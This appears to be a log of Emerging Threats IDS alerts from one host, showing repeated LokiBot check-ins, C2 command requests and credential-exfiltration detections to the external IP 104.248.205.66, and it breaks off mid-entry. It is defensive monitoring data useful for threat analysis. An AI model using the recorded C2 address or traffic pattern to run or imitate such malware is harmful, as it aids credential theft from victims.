ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:57.235849+0200
SID:	2024318
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:08.538051+0200
SID:	2024313
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:08.538051+0200
SID:	2024318
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:31.573054+0200
SID:	2024313
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:31.573054+0200
SID:	2024318
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:52.278473+0200
SID:	2024313
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:52.278473+0200
SID:	2024318
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:31.850643+0200
SID:	2021641
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:31.850643+0200
SID:	2025381
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:30.099350+0200
SID:	2021641
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:30.099350+0200
SID:	2025381
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:09.894995+0200
SID:	2021641
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:09.894995+0200
SID:	2025381
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:34.483482+0200
SID:	2021641
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:34.483482+0200
SID:	2025381
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:37.441389+0200
SID:	2021641
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:37.441389+0200
SID:	2025381
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:57.393911+0200
SID:	2021641
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:57.393911+0200
SID:	2025381
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:04.783249+0200
SID:	2021641
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:04.783249+0200
SID:	2025381
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:42.108847+0200
SID:	2024313
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:42.108847+0200
SID:	2024318
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:56.010523+0200
SID:	2024312
Severity:	1
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:02.379636+0200
SID:	2021641
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:02.379636+0200
SID:	2025381
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:42.412382+0200
SID:	2024313
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:42.412382+0200
SID:	2024318
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:19.961465+0200
SID:	2024313
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:19.961465+0200
SID:	2024318
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:34.819178+0200
SID:	2024313
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:34.819178+0200
SID:	2024318
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:44.658105+0200
SID:	2024313
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:44.658105+0200
SID:	2024318
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:34.162896+0200
SID:	2024313
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:34.162896+0200
SID:	2024318
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:39.972478+0200
SID:	2024313
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:39.972478+0200
SID:	2024318
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:39.833421+0200
SID:	2021641
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:39.833421+0200
SID:	2025381
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:14.151085+0200
SID:	2024313
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:14.151085+0200
SID:	2024318
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:21.616215+0200
SID:	2024313
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:21.616215+0200
SID:	2024318
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:51.197441+0200
SID:	2021641
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:51.197441+0200
SID:	2025381
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:53.422002+0200
SID:	2024312
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:27.434952+0200
SID:	2024313
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:27.434952+0200
SID:	2024318
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:26.720005+0200
SID:	2021641
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:26.720005+0200
SID:	2025381
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:22.379291+0200
SID:	2024313
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:22.379291+0200
SID:	2024318
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:37.503478+0200
SID:	2021641
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:37.503478+0200
SID:	2025381
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:34.970294+0200
SID:	2021641
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:34.970294+0200
SID:	2025381
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:25.191402+0200
SID:	2021641
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:25.191402+0200
SID:	2025381
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:04.631989+0200
SID:	2024313
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:04.631989+0200
SID:	2024318
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:58.527194+0200
SID:	2024313
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:58.527194+0200
SID:	2024318
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:00.883637+0200
SID:	2024313
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:00.883637+0200
SID:	2024318
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:07.250483+0200
SID:	2021641
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:07.250483+0200
SID:	2025381
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:03.415827+0200
SID:	2024313
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:03.415827+0200
SID:	2024318
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:17.573612+0200
SID:	2024313
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:17.573612+0200
SID:	2024318
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:22.534398+0200
SID:	2021641
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:22.534398+0200
SID:	2025381
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:27.594258+0200
SID:	2021641
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:27.594258+0200
SID:	2025381
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:50.004455+0200
SID:	2021641
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:50.004455+0200
SID:	2025381
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:47.563972+0200
SID:	2021641
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:47.563972+0200
SID:	2025381
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:32.566846+0200
SID:	2021641
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:32.566846+0200
SID:	2025381
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:49.551951+0200
SID:	2024313
Severity:	1
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:49.551951+0200
SID:	2024318
Severity:	1
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:37.353714+0200
SID:	2024313
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:37.353714+0200
SID:	2024318
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:47.295065+0200
SID:	2021641
Severity:	1
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:47.295065+0200
SID:	2025381
Severity:	1
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:58.674545+0200
SID:	2021641
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:02:58.674545+0200
SID:	2025381
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:02.225701+0200
SID:	2024313
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:02.225701+0200
SID:	2024318
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:47.408084+0200
SID:	2024313
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:47.408084+0200
SID:	2024318
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:47.124603+0200
SID:	2024313
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:47.124603+0200
SID:	2024318
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:12.157744+0200
SID:	2024313
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:12.157744+0200
SID:	2024318
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:12.552431+0200
SID:	2021641
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:12.552431+0200
SID:	2025381
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:19.141350+0200
SID:	2024313
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:19.141350+0200
SID:	2024318
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:52.443390+0200
SID:	2021641
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:52.443390+0200
SID:	2025381
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:42.563782+0200
SID:	2021641
Severity:	1
Source Port:	49741
